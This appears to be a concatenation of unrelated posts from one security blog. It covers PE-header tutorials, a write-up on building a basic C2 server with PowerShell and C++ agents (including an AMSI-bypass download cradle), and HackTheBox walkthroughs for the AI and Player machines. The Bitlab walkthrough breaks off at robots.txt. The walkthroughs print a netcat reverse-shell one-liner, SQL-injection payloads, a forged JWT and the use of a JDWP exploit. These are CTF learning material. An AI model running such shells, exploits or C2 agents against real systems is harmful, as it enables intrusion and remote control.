The authors of the malware overwrote the original Rich Header in the malware executable with the Rich Header of another malware attributed to the Lazarus threat group to make it look like it was Lazarus.
You can check Kaspersky’s report for more information about this.
The Rich Header consists of a chunk of XORed data followed by a signature (Rich) and a 32-bit checksum value that is the XOR key.
The encrypted data consists of a DWORD signature DanS, 3 zeroed-out DWORDs for padding, then pairs of DWORDS each pair representing an entry, and each entry holds a tool name, its build number and the number of times it’s been used.
In each DWORD pair the first pair holds the type ID or the product ID in the high WORD and the build ID in the low WORD, the second pair holds the use count.
PE-bear parses the Rich Header automatically:
As you can see the DanS signature is the first thing in the structure, then there are 3 zeroed-out DWORDs and after that comes the entries.
We can also see the corresponding tools and Visual Studio versions of the product and build IDs.
As an exercise I wrote a script to parse this header myself, it’s a very simple process, all we need to do is to XOR the data, then read the entry pairs and translate them.
Please note that I had to reverse the byte-order because the data was presented in little-endian.
After running the script we can see an output that’s identical to PE-bear’s interpretation, meaning that the script works fine.
Translating these values into the actual tools types and versions is a matter of collecting the values from actual Visual Studio installations.
I checked the source code of bearparser (the parser used in PE-bear) and I found comments mentioning where these values were collected from.
//list from: https://github.com/kirschju/richheader//list based on: https://github.com/kirschju/richheader + pnx's notes
In this post we talked about the first two parts of the PE file, the DOS header and the DOS stub, we looked at the members of the DOS header structure and we reversed the DOS stub program.
We also looked at the Rich Header, a structure that’s not essentially a part of the PE file format but was worth checking.
The following image summarizes what we’ve talked about in this post:
A dive into the PE file format - PE file structure - Part 1: Overview
Introduction
The aim of this post is to provide a basic introduction to the PE file structure without talking about any details.
PE files
PE stands for Portable Executable, it’s a file format for executables used in Windows operating systems, it’s based on the COFF file format (Common Object File Format).
Not only .exe files are PE files, dynamic link libraries (.dll), Kernel modules (.srv), Control panel applications (.cpl) and many others are also PE files.
A PE file is a data structure that holds information necessary for the OS loader to be able to load that executable into memory and execute it.
Structure Overview
A typical PE file follows the structure outlined in the following figure:
If we open an executable file with PE-bear we’ll see the same thing:
DOS Header
Every PE file starts with a 64-bytes-long structure called the DOS header, it’s what makes the PE file an MS-DOS executable.
DOS Stub
After the DOS header comes the DOS stub which is a small MS-DOS 2.0 compatible executable that just prints an error message saying “This program cannot be run in DOS mode” when the program is run in DOS mode.
NT Headers
The NT Headers part contains three main parts:
PE signature: A 4-byte signature that identifies the file as a PE file.
File Header: A standard COFF File Header. It holds some information about the PE file.
Optional Header: The most important header of the NT Headers, its name is the Optional Header because some files like object files don’t have it, however it’s required for image files (files like .exe files). This header provides important information to the OS loader.
Section Table
The section table follows the Optional Header immediately, it is an array of Image Section Headers, there’s a section header for every section in the PE file.
Each header contains information about the section it refers to.
Sections
Sections are where the actual contents of the file are stored, these include things like data and resources that the program uses, and also the actual code of the program, there are several sections each one with its own purpose.
Conclusion
In this post we looked at a very basic overview of the PE file structure and talked briefly about the main parts of a PE files.
In the upcoming posts we’ll talk about each one of these parts in much more detail.
This is going to be a series of blog posts covering PE files in depth, it’s going to include a range of different topics, mainly the structure of PE files on disk and the way PE files get mapped and loaded into memory, we’ll also discuss applying that knowledge into building proof-of-concepts like PE parsers, packers and loaders, and also proof-of-concepts for some of the memory injection techniques that require this kind of knowledge, techniques like PE injection, process hollowing, dll reflective injection etc..
Why ?
The more I got into reverse engineering or malware development the more I found that knowledge about the PE file format is absolutely essential, I already knew the basics about PE files but I never learned about them properly.
Lately I have decided to learn about PE files, so the upcoming series of posts is going to be a documentation of what I’ve learned.
These posts are not going to cover anything new, there are a lot of resources that talk about the same thing, also the techniques that are going to be covered later have been known for some time.
The goal is not to present anything new, the goal is to form a better understanding of things that already exist.
Contribution
If you’d like to add anything or if you found a mistake that needs correction feel free to contact me. Contact information can be found in the about page.
It’s very common that after successful exploitation an attacker would put an agent that maintains communication with a c2 server on the compromised system, and the reason for that is very simple, having an agent that provides persistency over large periods and almost all the capabilities an attacker would need to perform lateral movement and other post-exploitation actions is better than having a reverse shell for example. There are a lot of free open source post-exploitation toolsets that provide this kind of capability, like Metasploit, Empire and many others, and even if you only play CTFs it’s most likely that you have used one of those before.
Long story short, I only had a general idea about how these tools work and I wanted to understand the internals of them, so I decided to try and build one on my own. For the last three weeks, I have been searching and coding, and I came up with a very basic implementation of a c2 server and an agent. In this blog post I’m going to explain the approaches I took to build the different pieces of the tool.
Please keep in mind that some of these approaches might not be the best and also the code might be kind of messy, If you have any suggestions for improvements feel free to contact me, I’d like to know what better approaches I could take. I also like to point out that this is not a tool to be used in real engagements, besides only doing basic actions like executing cmd and powershell, I didn’t take in consideration any opsec precautions.
This tool is still a work in progress, I finished the base but I’m still going to add more execution methods and more capabilities to the agent. After adding new features I will keep writing posts similar to this one, so that people with more experience give feedback and suggest improvements, while people with less experience learn.
The server itself is written in python3, I wrote two agents, one in c++ and the other in powershell, listeners are http listeners.
I couldn’t come up with a nice name so I would appreciate suggestions.
Listeners
Basic Info
Listeners are the core functionality of the server because they provide the way of communication between the server and the agents. I decided to use http listeners, and I used flask to create the listener application.
A Listener object is instantiated with a name, a port and an IP address to bind to:
The flask application which provides all the functionality of the listener has 5 routes: /reg, /tasks/<name>, /results/<name>, /download/<name>, /sc/<name>.
/reg
/reg is responsible for handling new agents, it only accepts POST requests and it takes two parameters: name and type. name is for the hostname while type is for the agent’s type.
When it receives a new request it creates a random string of 6 uppercase letters as the new agent’s name (that name can be changed later), then it takes the hostname and the agent’s type from the request parameters. It also saves the remote address of the request which is the IP address of the compromised host.
With these information it creates a new Agent object and saves it to the agents database, and finally it responds with the generated random name so that the agent on the other side can know its name.
/tasks/<name> is the endpoint that agents request to download their tasks, <name> is a placeholder for the agent’s name, it only accepts GET requests.
It simply checks if there are new tasks (by checking if the tasks file exists), if there are new tasks it responds with the tasks, otherwise it sends an empty response (204).
/results/<name> is the endpoint that agents request to send results, <name> is a placeholder for the agent’s name, it only accepts POST requests and it takes one parameter: result for the results.
It takes the results and sends them to a function called displayResults() (more on that function in the agent handler part), then it sends an empty response 204.
/sc/<name> is just a wrapper around the /download/<name> endpoint for powershell scripts, it responds with a download cradle prepended with a oneliner to bypass AMSI, the oneliner downloads the original script from /download/<name> , <name> is a placeholder for the script name, it only accepts GET requests.
It takes the script name, creates a download cradle in the following format:
I had to start listeners in threads, however flask applications don’t provide a reliable way to stop the application once started, the only way was to kill the process, but killing threads wasn’t also so easy, so what I did was creating a Process object for the function that starts the application, and a thread that starts that process which means that terminating the process would kill the thread and stop the application.
As mentioned earlier, I wrote two agents, one in powershell and the other in c++. Before going through the code of each one, let me talk about what agents do.
When an agent is executed on a system, first thing it does is get the hostname of that system then send the registration request to the server (/reg as discussed earlier).
After receiving the response which contains its name it starts an infinite loop in which it keeps checking if there are any new tasks, if there are new tasks it executes them and sends the results back to the server.
After each loop it sleeps for a specified amount of time that’s controlled by the server, the default sleep time is 3 seconds.
Let’s take a look inside the loop, first thing it does is request new tasks, we know that if there are no new tasks the server will respond with a 204 empty response, so it checks if the response is not null or empty and based on that it decides whether to execute the task execution code block or just sleep again:
If the flag was VALID it will continue, otherwise it will sleep again. This ensures that the data has been decrypted correctly.
if($flag-eq"VALID"){
After ensuring that the data is valid, it takes the command it’s supposed to execute and the arguments:
$command=$task[1]$args=$task[2..$task.Length]
There are 5 valid commands, shell, powershell, rename, sleep and quit.
shell executes cmd commands, powershell executes powershell commands, rename changes the agent’s name, sleep changes the sleep time and quit just exits.
Let’s take a look at each one of them. The shell and powershell commands basically rely on the same function called shell, so let’s look at that first:
It starts a new process with the given file name whether it was cmd.exe or powershell.exe and passes the given arguments, then it receives stdout and stderr and returns the result which is the VALID flag appended with stdout and stderr separated by a newline.
Now back to the shell and powershell commands, both of them call shell() with the corresponding file name, receive the output, encrypt it and send it:
The rename command updates the name variable and updates the tasks and results uris, then it sends an empty result indicating that it completed the task:
The same logic is applied in the c++ agent so I will skip the unnecessary parts and only talk about the http functions and the shell function.
Sending http requests wasn’t as easy as it was in powershell, I used the winhttp library and with the help of the Microsoft documentation I created two functions, one for sending GET requests and the other for sending POST requests. And they’re almost the same function so I guess I will rewrite them to be one function later.
The shell function does the almost the same thing as the shell function in the other agent, some of the code is taken from Stack Overflow and I edited it:
Then it defines the sleep time which is 3 seconds by default as discussed, it needs to keep track of the sleep time to be able to determine if an agent is dead or not when removing an agent, otherwise it will keep waiting for the agent to call forever:
self.sleept=3
After that it creates the needed directories and files:
And finally it creates the menu for the agent, but I won’t cover the Menu class in this post because it doesn’t relate to the core functionality of the tool.
self.menu=menu.Menu(self.name)self.menu.registerCommand("shell","Execute a shell command.","<command>")self.menu.registerCommand("powershell","Execute a powershell command.","<command>")self.menu.registerCommand("sleep","Change agent's sleep time.","<time (s)>")self.menu.registerCommand("clear","Clear tasks.","")self.menu.registerCommand("quit","Task agent to quit.","")self.menu.uCommands()self.Commands=self.menu.Commands
I won’t talk about the wrapper functions because we only care about the core functions.
First function is the writeTask() function, which is a quite simple function, it takes the task and prepends it with the VALID flag then it writes it to the tasks path:
As you can see, it only encrypts the task in case of powershell agent only, that’s because there’s no encryption in the c++ agent (more on that in the encryption part).
Second function I want to talk about is the clearTasks() function which just deletes the tasks file, very simple:
Third function is a very important function called update(), this function gets called when an agent is renamed and it updates the paths. As seen earlier, the paths depend on the agent’s name, so without calling this function the agent won’t be able to download its tasks.
The remaining functions are wrappers that rely on these functions or helper functions that rely on the wrappers. One example is the shell function which just takes the command and writes the task:
The last function I want to talk about is a helper function called displayResults which takes the sent results and the agent name. If the agent is a powershell agent it decrypts the results and checks their validity then prints them, otherwise it will just print the results:
defdisplayResults(name,result):ifisValidAgent(name,0)==True:ifresult=="":success("Agent {} completed task.".format(name))else:key=agents[name].keyifagents[name].Type=="p":try:plaintext=DECRYPT(result,key)except:return0ifplaintext[:5]=="VALID":success("Agent {} returned results:".format(name))print(plaintext[6:])else:return0else:success("Agent {} returned results:".format(name))print(result)
Payloads Generator
Any c2 server would be able to generate payloads for active listeners, as seen earlier in the agents part, we only need to change the IP address, port and key in the agent template, or just the IP address and port in case of the c++ agent.
PowerShell
Doing this with the powershell agent is simple because a powershell script is just a text file so we just need to replace the strings REPLACE_IP, REPLACE_PORT and REPLACE_KEY.
The powershell function takes a listener name, and an output name. It grabs the needed options from the listener then it replaces the needed strings in the powershell template and saves the new file in two places, /tmp/ and the files path for the listener. After doing that it generates a download cradle that requests /sc/ (the endpoint discussed in the listeners part).
It wasn’t as easy as it was with the powershell agent, because the c++ agent would be a compiled PE executable.
It was a huge problem and I spent a lot of time trying to figure out what to do, that was when I was introduced to the idea of a stub.
The idea is to append whatever data that needs to be dynamically assigned to the executable, and design the program in a way that it reads itself and pulls out the appended information.
In the source of the agent I added a few lines of code that do the following:
The winexe function takes a listener name, an architecture and an output name, grabs the needed options from the listener and appends them to the template corresponding to the selected architecture and saves the new file in /tmp:
I’m not very good at cryptography so this part was the hardest of all. At first I wanted to use AES and do Diffie-Hellman key exchange between the server and the agent. However I found that powershell can’t deal with big integers without the .NET class BigInteger, and because I’m not sure that the class would be always available I gave up the idea and decided to hardcode the key while generating the payload because I didn’t want to risk the compatibility of the agent. I could use AES in powershell easily, however I couldn’t do the same in c++, so I decided to use a simple xor but again there were some issues, that’s why the winexe agent won’t be using any encryption until I figure out what to do.
Let’s take a look at the crypto functions in both the server and the powershell agent.
Server
The AESCipher class uses the AES class from the pycrypto library, it uses AES CBC 256.
An AESCipher object is instantiated with a key, it expects the key to be base-64 encoded:
The powershell agent uses the .NET class System.Security.Cryptography.AesManaged.
First function is the Create-AesManagedObject which instantiates an AesManaged object using the given key and IV. It’s a must to use the same options we decided to use on the server side which are CBC mode, zeros padding and 32 bytes key length:
After that it checks if the provided key and IV are of the type String (which means that the key or the IV is base-64 encoded), depending on that it decodes the data before using them, then it returns the AesManaged object.
The Encrypt function takes a key and a plain text string, converts that string to bytes, then it uses the Create-AesManagedObject function to create the AesManaged object and it encrypts the string with a random generated IV.
I used pickle to serialize agents and listeners and save them in databases, when you exit the server it saves all of the agent objects and listeners, then when you start it again it loads those objects again so you don’t lose your agents or listeners.
For the listeners, pickle can’t serialize objects that use threads, so instead of saving the objects themselves I created a dictionary that holds all the information of the active listeners and serialized that, the server loads that dictionary and starts the listeners again according to the options in the dictionary.
I created wrapper functions that read, write and remove objects from the databases:
I will show you a quick demo on a Windows Server 2016 target.
This is how the home of the server looks like:
Let’s start by creating a listener:
Now let’s create a payload, I created the three available payloads:
After executing the payloads on the target we’ll see that the agents successfully contacted the server:
Let’s rename the agents:
I executed 4 simple commands on each agent:
Then I tasked each agent to quit.
And that concludes this blog post, as I said before I would appreciate all the feedback and the suggestions so feel free to contact me on twitter @Ahm3d_H3sham.
If you liked the article tweet about it, thanks for reading.
Hey guys, today AI retired and here’s my write-up about it. It’s a medium rated Linux box and its ip is 10.10.10.163, I added it to /etc/hosts as ai.htb. Let’s jump right in !
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/AI# nmap -sV -sT -sC -o nmapinitial ai.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 17:46 EST
Nmap scan report for ai.htb (10.10.10.163)
Host is up (0.83s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.15 seconds
root@kali:~/Desktop/HTB/boxes/AI#
We got ssh on port 22 and http on port 80.
Web Enumeration
The index page was empty:
By hovering over the logo a menu appears:
The only interesting page there was /ai.php. From the description (“Drop your query using wav file.”) my first guess was that it’s a speech recognition service that processes users’ input and executes some query based on that processed input, And there’s also a possibility that this query is a SQL query but we’ll get to that later.:
I also found another interesting page with gobuster:
SQL injection –> Alexa’s Credentials –> SSH as Alexa –> User Flag
As I said earlier, we don’t know what does it mean by “query” but it can be a SQL query. When I created another audio file that says it's a test I got a SQL error because of ' in it's:
The injection part was the hardest part of this box because it didn’t process the audio files correctly most of the time, and it took me a lot of time to get my payloads to work.
First thing I did was to get the database name.
Payload:
one open single quote union select database open parenthesis close parenthesis comment database
The database name was alexa, next thing I did was enumerating table names, my payload was like the one shown below and I kept changing the test after from and tried possible and common things.
Payload:
one open single quote union select test from test comment database
The table users existed.
Payload:
one open single quote union select test from users comment database
From here it was easy to guess the column names, username and password. The problem with username was that it processed user and name as two different words so I couldn’t make it work.
Payload:
one open single quote union select username from users comment database
password worked just fine.
Payload:
one open single quote union select password from users comment database
Without knowing the username we can’t do anything with the password, I tried alexa which was the database name and it worked:
We owned user.
JDWP –> Code Execution –> Root Shell –> Root Flag
Privilege escalation on this box was very easy, when I checked the running processes I found this one:
This was related to an Apache Tomcat server that was running on localhost, I looked at that server for about 10 minutes but it was empty and I couldn’t do anything there, it was a rabbit hole. If we check the listening ports we’ll see 8080, 8005 and 8009 which is perfectly normal because these are the ports used by tomcat, but we’ll also see 8000:
alexa@AI:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 127.0.0.1:8009 :::* LISTEN -
alexa@AI:~$
A quick search on that port and how it’s related to tomcat revealed that it’s used for debugging, jdwp is running on that port.
The Java Debug Wire Protocol (JDWP) is the protocol used for communication between a debugger and the Java virtual machine (VM) which it debugs (hereafter called the target VM). -docs.oracle.com
By looking at the process again we can also see this parameter given to the java binary:
I searched for exploits for the jdwp service and found this exploit. I uploaded the python script on the box and I added the reverse shell payload to a file and called it pwned.sh then I ran the exploit:
alexa@AI:/dev/shm$ nano pwned.sh
alexa@AI:/dev/shm$ chmod +x pwned.sh
alexa@AI:/dev/shm$ cat pwned.sh
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
alexa@AI:/dev/shm$ python jdwp-shellifier.py -t 127.0.0.1 --cmd /dev/shm/pwned.sh
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=b8c
[+] Found Runtime.getRuntime(): id=7f40bc03e790
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
Then from another ssh session I triggered a connection on port 8005:
alexa@AI:~$ nc localhost 8005
And the code was executed:
alexa@AI:/dev/shm$ nano pwned.sh
alexa@AI:/dev/shm$ chmod +x pwned.sh
alexa@AI:/dev/shm$ cat pwned.sh
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
alexa@AI:/dev/shm$ python jdwp-shellifier.py -t 127.0.0.1 --cmd /dev/shm/pwned.sh
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=b8c
[+] Found Runtime.getRuntime(): id=7f40bc03e790
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x1
[+] Selected payload '/dev/shm/pwned.sh'
[+] Command string object created id:c31
[+] Runtime.getRuntime() returned context id:0xc32
[+] found Runtime.exec(): id=7f40bc03e7c8
[+] Runtime.exec() successful, retId=c33
[!] Command successfully executed
alexa@AI:/dev/shm$
And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham Thanks for reading.
Hey guys, today Player retired and here’s my write-up about it. It was a relatively hard CTF-style machine with a lot of enumeration and a couple of interesting exploits. It’s a Linux box and its ip is 10.10.10.145, I added it to /etc/hosts as player.htb. Let’s jump right in !
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/player# nmap -sV -sT -sC -o nmapinitial player.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 16:29 EST
Nmap scan report for player.htb (10.10.10.145)
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d7:30:db:b9:a0:4c:79:94:78:38:b3:43:a2:50:55:81 (DSA)
| 2048 37:2b:e4:31:ee:a6:49:0d:9f:e7:e6:01:e6:3e:0a:66 (RSA)
| 256 0c:6c:05:ed:ad:f1:75:e8:02:e4:d2:27:3e:3a:19:8f (ECDSA)
|_ 256 11:b8:db:f3:cc:29:08:4a:49:ce:bf:91:73:40:a2:80 (ED25519)
80/tcp open http Apache httpd 2.4.7
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.12 seconds
root@kali:~/Desktop/HTB/boxes/player#
We got http on port 80 and ssh on port 22.
Web Enumeration
I got a 403 response when I went to http://player.htb/:
root@kali:~/Desktop/HTB/boxes/player# wfuzz --hc 403 -c -w subdomains-top1mil-5000.txt -H "HOST: FUZZ.player.htb" http://10.10.10.145
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.145/
Total requests: 4997
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000019: 200 86 L 229 W 5243 Ch "dev"
000000067: 200 63 L 180 W 1470 Ch "staging"
000000070: 200 259 L 714 W 9513 Ch "chat"
Total time: 129.1540
Processed Requests: 4997
Filtered Requests: 4994
Requests/sec.: 38.69021
root@kali:~/Desktop/HTB/boxes/player#
I added them to my hosts file and started checking each one of them.
On dev there was an application that needed credentials so we’ll skip that one until we find some credentials:
staging was kinda empty but there was an interesting contact form:
The form was interesting because when I attempted to submit it I got a weird error for a second then I got redirected to /501.php:
I intercepted the request with burp to read the error.
Request:
GET/contact.php?firstname=test&subject=testHTTP/1.1Host:staging.player.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateReferer:http://staging.player.htb/contact.htmlConnection:closeUpgrade-Insecure-Requests:1
The error exposed some filenames like /var/www/backup/service_config, /var/www/staging/fix.php and /var/www/staging/contact.php. That will be helpful later. chat was a static page that simulated a chat application:
I took a quick look at the chat history between Olla and Vincent, Olla asked him about some pentest reports and he replied with 2 interesting things :
Staging exposing sensitive files.
Main domain exposing source code allowing to access the product before release.
We already saw that staging was exposing files, I ran gobuster on the main domain and found /launcher:
I tried to submit that form but it did nothing, I just got redirected to /launcher again:
Request:
GET/launcher/dee8dc8a47256c64630d803a4c40786c.phpHTTP/1.1Host:player.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateReferer:http://player.htb/launcher/index.htmlConnection:closeCookie:access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ.cjGwng6JiMiOWZGz7saOdOuhyr1vad5hAxOJCiM3uzUUpgrade-Insecure-Requests:1
Response:
HTTP/1.1302FoundDate:Fri, 17 Jan 2020 22:45:04 GMTServer:Apache/2.4.7 (Ubuntu)X-Powered-By:PHP/5.5.9-1ubuntu4.26Location:index.htmlContent-Length:0Connection:closeContent-Type:text/html
We know from the chat that the source code is exposed somewhere, I wanted to read the source of /launcher/dee8dc8a47256c64630d803a4c40786c.php so I tried some basic stuff like adding .swp, .bak and ~ after the file name. ~ worked (check this out):
It decodes the JWT token from the cookie access and redirects us to a redacted path if the value of access_code was 0E76658526655756207688271159624026011393, otherwise it will assign an access cookie for us with C0B137FE2D792459F26FF763CCE44574A5B5AB03 as the value of access_code and redirect us to index.html.
We have the secret _S0_R@nd0m_P@ss_ so we can easily craft a valid cookie. I used jwt.io to edit my token.
I used the cookie and got redirected to /7F2dcsSdZo6nj3SNMTQ1:
Request:
GET/launcher/dee8dc8a47256c64630d803a4c40786c.phpHTTP/1.1Host:player.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateReferer:http://player.htb/launcher/index.htmlConnection:closeCookie:access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKqw__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyEUpgrade-Insecure-Requests:1
Response:
HTTP/1.1302FoundDate:Fri, 17 Jan 2020 22:50:59 GMTServer:Apache/2.4.7 (Ubuntu)X-Powered-By:PHP/5.5.9-1ubuntu4.26Location:7F2dcsSdZo6nj3SNMTQ1/Content-Length:0Connection:closeContent-Type:text/html
contact.php didn’t have anything interesting and the avi for fix.php was empty for some reason. In service_config there were some credentials for a user called telegen:
I tried these credentials with ssh and with dev.player.htb and they didn’t work. I ran a quick full port scan with masscan and turns out that there was another open port:
root@kali:~/Desktop/HTB/boxes/player# masscan -p1-65535 10.10.10.145 --rate=1000 -e tun0
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-18 00:09:24 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.145
Discovered open port 80/tcp on 10.10.10.145
Discovered open port 6686/tcp on 10.10.10.145
I scanned that port with nmap but it couldn’t identify the service:
PORT STATE SERVICE VERSION
6686/tcp open tcpwrapped
However when I connected to the port with nc the banner indicated that it was an ssh server:
I couldn’t write to it but it included another php file which I could write to (/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php):
www-data@player:/tmp$cd/var/lib/playbuff/www-data@player:/var/lib/playbuff$catbuff.php<?phpinclude("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");classplayBuff{public$logFile="/var/log/playbuff/logs.txt";public$logData="Updated";publicfunction__wakeup(){file_put_contents(__DIR__."/".$this->logFile,$this->logData);}}$buff=newplayBuff();$serialbuff=serialize($buff);$data=file_get_contents("/var/lib/playbuff/merge.log");if(unserialize($data)){$update=file_get_contents("/var/lib/playbuff/logs.txt");$query=mysqli_query($conn,"update stats set status='$update' where id=1");if($query){echo'Update Success with serialized logs!';}}else{file_put_contents("/var/lib/playbuff/merge.log","no issues yet");$update=file_get_contents("/var/lib/playbuff/logs.txt");$query=mysqli_query($conn,"update stats set status='$update' where id=1");if($query){echo'Update Success!';}}?>
www-data@player:/var/lib/playbuff$
I put my reverse shell payload in /tmp and added a line to /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php that executed it:
And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham Thanks for reading.
Hey guys, today Bitlab retired and here’s my write-up about it. It was a nice CTF-style machine that mainly had a direct file upload and a simple reverse engineering challenge. It’s a Linux box and its ip is 10.10.10.114, I added it to /etc/hosts as bitlab.htb. Let’s jump right in !
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/bitlab# nmap -sV -sT -sC -o nmapinitial bitlab.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-10 13:44 EST
Nmap scan report for bitlab.htb (10.10.10.114)
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
| 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open http nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://bitlab.htb/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.56 seconds
root@kali:~/Desktop/HTB/boxes/bitlab#
We got http on port 80 and ssh on port 22, robots.txt existed on the web server and it had a lot of entries.
Web Enumeration
Gitlab was running on the web server and we need credentials:
I checked /robots.txt to see if there was anything interesting:
root@kali:~/Desktop/HTB/boxes/bitlab# curl http://bitlab.htb/robots.txt [18/43]
# See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow: /
# Add a 1 second delay between successive requests to the same server, limits resources used by crawler
# Only some crawlers respect this setting, e.g. Googlebot does not
# Crawl-delay: 1
# Based on details in https://gitlab.com/gitlab-org/gitlab-ce/blob/master/config/routes.rb, https://gitlab.com/gitlab-org/gitlab-ce/blob/master/spec/routing, and using application
User-Agent: *
Disallow: /autocomplete/users
Disallow: /search
Disallow: /api
Disallow: /admin
Disallow: /profile
Disallow: /dashboard
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in
# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw
# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
